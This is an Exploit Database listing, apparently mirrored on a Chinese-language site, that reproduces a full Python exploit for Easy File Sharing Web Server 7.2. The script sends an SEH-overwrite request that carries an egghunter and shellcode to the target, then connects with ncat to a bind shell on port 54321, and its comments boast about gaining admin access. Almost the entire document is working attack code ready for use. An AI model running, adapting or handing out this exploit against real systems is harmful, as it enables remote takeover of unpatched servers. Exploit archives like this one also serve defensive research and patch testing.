Easy File Sharing Web Server 7.2 – Remote Overflow (Egghunter) (SEH)

• Exploit Database
• 15 阅读

• 作者： ch3rn0byl
  日期： 2016-07-29
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/40178/

• #!/usr/bin/python
  # Exploit Title: Easy File Sharing Web Server 7.2 SEH Overflow with Egghunter
  # Date: July 29, 2016
  # Exploit Author: ch3rn0byl
  # Vendor Homepage: http://www.sharing-file.com/
  # Software Link: http://www.sharing-file.com/download.php
  # Version: 7.2
  # Tested on: Windows 7, 8, 8.1, 10
  # Admin privileges anyone?? hehe ;)
  
  from socket import socket, AF_INET, SOCK_STREAM
  from sys import argv
  from struct import pack
  from time import sleep
  from subprocess import call
  
  host = argv[1]
  
  rekt =""
  rekt += "\x93\x93\x48\xf5\x93\x93\x90\xf9\x90\x37\x4a\x48\x90"
  rekt += "\x99\x9b\x37\x98\x9f\xfc\xd6\xbd\x71\xab\x9a\xbc\xdb"
  rekt += "\xd0\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x53\x31\x6f\x12"
  rekt += "\x83\xef\xfc\x03\x1e\xa5\x78\x49\x1c\x51\xfe\xb2\xdc"
  rekt += "\xa2\x9f\x3b\x39\x93\x9f\x58\x4a\x84\x2f\x2a\x1e\x29"
  rekt += "\xdb\x7e\x8a\xba\xa9\x56\xbd\x0b\x07\x81\xf0\x8c\x34"
  rekt += "\xf1\x93\x0e\x47\x26\x73\x2e\x88\x3b\x72\x77\xf5\xb6"
  rekt += "\x26\x20\x71\x64\xd6\x45\xcf\xb5\x5d\x15\xc1\xbd\x82"
  rekt += "\xee\xe0\xec\x15\x64\xbb\x2e\x94\xa9\xb7\x66\x8e\xae"
  rekt += "\xf2\x31\x25\x04\x88\xc3\xef\x54\x71\x6f\xce\x58\x80"
  rekt += "\x71\x17\x5e\x7b\x04\x61\x9c\x06\x1f\xb6\xde\xdc\xaa"
  rekt += "\x2c\x78\x96\x0d\x88\x78\x7b\xcb\x5b\x76\x30\x9f\x03"
  rekt += "\x9b\xc7\x4c\x38\xa7\x4c\x73\xee\x21\x16\x50\x2a\x69"
  rekt += "\xcc\xf9\x6b\xd7\xa3\x06\x6b\xb8\x1c\xa3\xe0\x55\x48"
  rekt += "\xde\xab\x31\xbd\xd3\x53\xc2\xa9\x64\x20\xf0\x76\xdf"
  rekt += "\xae\xb8\xff\xf9\x29\xbe\xd5\xbe\xa5\x41\xd6\xbe\xec"
  rekt += "\x85\x82\xee\x86\x2c\xab\x64\x56\xd0\x7e\x10\x5e\x77"
  rekt += "\xd1\x07\xa3\xc7\x81\x87\x0b\xa0\xcb\x07\x74\xd0\xf3"
  rekt += "\xcd\x1d\x79\x0e\xee\xf5\x4b\x87\x08\x9f\xbb\xc1\x83"
  rekt += "\x37\x7e\x36\x1c\xa0\x81\x1c\x34\x46\xc9\x76\x83\x69"
  rekt += "\xca\x5c\xa3\xfd\x41\xb3\x77\x1c\x56\x9e\xdf\x49\xc1"
  rekt += "\x54\x8e\x38\x73\x68\x9b\xaa\x10\xfb\x40\x2a\x5e\xe0"
  rekt += "\xde\x7d\x37\xd6\x16\xeb\xa5\x41\x81\x09\x34\x17\xea"
  rekt += "\x89\xe3\xe4\xf5\x10\x61\x50\xd2\x02\xbf\x59\x5e\x76"
  rekt += "\x6f\x0c\x08\x20\xc9\xe6\xfa\x9a\x83\x55\x55\x4a\x55"
  rekt += "\x96\x66\x0c\x5a\xf3\x10\xf0\xeb\xaa\x64\x0f\xc3\x3a"
  rekt += "\x61\x68\x39\xdb\x8e\xa3\xf9\xeb\xc4\xe9\xa8\x63\x81"
  rekt += "\x78\xe9\xe9\x32\x57\x2e\x14\xb1\x5d\xcf\xe3\xa9\x14"
  rekt += "\xca\xa8\x6d\xc5\xa6\xa1\x1b\xe9\x15\xc1\x09"
  
  # Our tag is hive: \x68\x69\x76\x65
  
  egghunter = ''
  egghunter += '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c'
  egghunter += '\x05\x5a\x74\xef\xb8\x68\x69\x76\x65\x8b\xfa\xaf\x75'
  egghunter += '\xea\xaf\x75\xe7\xff\xe7'
  
  crash = "A" * 4061
  crash += pack('<L', 0x909006eb)
  crash += pack('<L', 0x10019ce3)
  crash += egghunter
  crash += "D" * (5500 - 4061 - 8 - len(egghunter))
  
  payload = 'GET {} HTTP/1.0\r\n\r\n'.format(crash)
  payload += 'hivehive'
  payload += rekt
  payload += 'E' * (800 - len(rekt))
  
  print '[+] Trying to exploit {}...'.format(host)
  
  try:
  s = socket(AF_INET, SOCK_STREAM)
  s.connect((host, 80))
  print '[+] Sending payload...'
  s.send(payload)
  s.close()
  print '[+] Trying to connect to target...\n'
  try:
  sleep(2)
  call(['ncat', host, '54321'])
  except:
  print '[!] Whoops!! Something went wrong?'
  except:
  print '[!] Whoops!! Something went wrong?'
  finally:
  print '\n[+] I <3 SHELLS'